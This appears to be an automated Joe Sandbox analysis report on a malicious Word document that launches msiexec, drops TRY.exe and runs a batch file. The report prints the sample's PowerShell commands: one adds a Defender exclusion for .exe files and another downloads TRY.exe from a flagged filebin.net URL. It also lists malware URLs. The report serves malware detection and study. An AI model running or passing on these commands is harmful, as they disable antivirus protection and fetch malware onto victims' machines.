Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe TID: 2416Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1424Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1424Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 2476Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2532Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB65E4C GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61C38 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB67F40 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB67C44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeProcess created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB612C0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB68114 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB629E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
1
Replication Through Removable Media		21
Scripting		1
Registry Run Keys / Startup Folder		1
Access Token Manipulation		21
Scripting		OS Credential Dumping1
System Time Discovery		1
Replication Through Removable Media		1
Archive Collected Data		Exfiltration Over Other Network Medium2
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts2
Native API		1
Services File Permissions Weakness		11
Process Injection		1
File Deletion		LSASS Memory11
Peripheral Device Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth21
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts3
Exploitation for Client Execution		Logon Script (Windows)1
Registry Run Keys / Startup Folder		21
Masquerading		Security Account Manager4
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Command and Scripting Interpreter		Logon Script (Mac)1
Services File Permissions Weakness		1
Modify Registry		NTDS17
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
Virtualization/Sandbox Evasion		LSA Secrets1
Query Registry		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Access Token Manipulation		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items11
Process Injection		DCSync21
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Services File Permissions Weakness		Proc Filesystem1
Remote System Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
Rundll32		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 611840 Sample: 12543_0008858249_FWDOUTSTAN... Startdate: 20/04/2022 Architecture: WINDOWS Score: 76 46 Multi AV Scanner detection for domain / URL 2->46 48 Antivirus detection for URL or domain 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 3 other signatures 2->52 9 msiexec.exe 4 11 2->9         started        13 WINWORD.EXE 292 25 2->13         started        15 rundll32.exe 2->15         started        process3 dnsIp4 42 filebin.net 185.47.40.36, 443, 49173 REDPILL-LINPRORedpillLinproNO Norway 9->42 44 situla.bitbit.net 87.238.33.8, 443, 49174 REDPILL-LINPRORedpillLinproNO Norway 9->44 38 C:\Windows\Installer\MSI9F1.tmp, PE32 9->38 dropped 17 msiexec.exe 5 9->17         started        40 C:\Users\user\...\~DFC2FF7A9553E7F48E.TMP, Composite 13->40 dropped file5 process6 process7 19 TRY.exe 1 3 17->19         started        21 expand.exe 4 17->21         started        24 icacls.exe 17->24         started        26 icacls.exe 17->26         started        file8 28 cmd.exe 19->28         started        34 C:\Users\user\AppData\...\TRY.exe (copy), PE32+ 21->34 dropped 36 C:\...\79bd875a22ddb24abfa2594fbd40eccf.tmp, PE32+ 21->36 dropped process9 process10 30 powershell.exe 7 28->30         started        32 powershell.exe 6 28->32         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
12543_0008858249_FWDOUTSTANDING_20200604.doc38%VirustotalBrowse
12543_0008858249_FWDOUTSTANDING_20200604.doc24%ReversingLabsWin32.Downloader.Mutisedow
12543_0008858249_FWDOUTSTANDING_20200604.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP100%Joe Sandbox ML
C:\Windows\Installer\MSI9F1.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI9F1.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
filebin.net5%VirustotalBrowse
situla.bitbit.net1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470100%Avira URL Cloudmalware
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi100%Avira URL Cloudmalware
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe100%Avira URL Cloudmalware
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:100%Avira URL Cloudmalware
https://filebin.net/rf43v6qzghbj7h7b/100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
filebin.net
185.47.40.36
truetrueunknown
situla.bitbit.net
87.238.33.8
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://filebin.net/rf43v6qzghbj7h7b/TRY.msitrue
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470~DFECA159C20646BB57.TMP.2.drtrue
  • Avira URL Cloud: malware
unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.exeexpand.exe, 00000007.00000003.919683562.00000000003CF000.00000004.00000800.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927628947.0000000001E20000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927698970.0000000002020000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000000.925076387.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945747952.0000000000286000.00000004.00000020.00020000.00000000.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, thai.bat.9.dr, MSI5B5A.tmp.2.dr, files.cab.4.drtrue
  • Avira URL Cloud: malware
unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:535fae.ipi.2.drtrue
  • Avira URL Cloud: malware
unknown
https://filebin.net/rf43v6qzghbj7h7b/~DFECA159C20646BB57.TMP.2.drtrue
  • Avira URL Cloud: malware
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
87.238.33.8
situla.bitbit.netNorway
39029REDPILL-LINPRORedpillLinproNOfalse
185.47.40.36
filebin.netNorway
39029REDPILL-LINPRORedpillLinproNOtrue

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:611840
Start date and time: 20/04/202209:18:032022-04-20 09:18:03 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 35s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:12543_0008858249_FWDOUTSTANDING_20200604.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.expl.winDOC@19/23@5/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 58.5%)
  • Quality average: 35.5%
  • Quality standard deviation: 35.4%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, conhost.exe
  • TCP Packets have been reduced to 100
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

TimeTypeDescription
09:19:15API Interceptor1365x Sleep call for process: msiexec.exe modified
09:19:24API Interceptor1x Sleep call for process: icacls.exe modified
09:19:31API Interceptor31x Sleep call for process: powershell.exe modified
09:19:36API Interceptor17x Sleep call for process: cmd.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):9216
Entropy (8bit):4.161759538213247
Encrypted:false
SSDEEP:96:6/4AVtYE5uI3U33ZsYEFL2l4oK3B24CxkZFivEwj98l1vu+X0jUrw62tbaAGi7A:6/4AVtF368vB27xkZF5P50jcw60aWA
MD5:D295AD2809D07DCE046748F3AF1C5035
SHA1:9E774C670AB933D4E984EFCE44B815781FDDCB5A
SHA-256:BC4DCE07AAA38FFD6445499BFF0DA6C48F5400C2A7FAA04B3F5BE2D273DE319E
SHA-512:9E7F25992E9B672FF95802703EDB822737BFCAF61425910B3DE80304AAD18D562FD270928EC68EA370E5604AF037A2BF0897D8AFFC87ABAAA6D3D94F202BEAC0
Malicious:false
Yara Hits:
  • Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1, Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp, Author: Nils Kuhnert
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

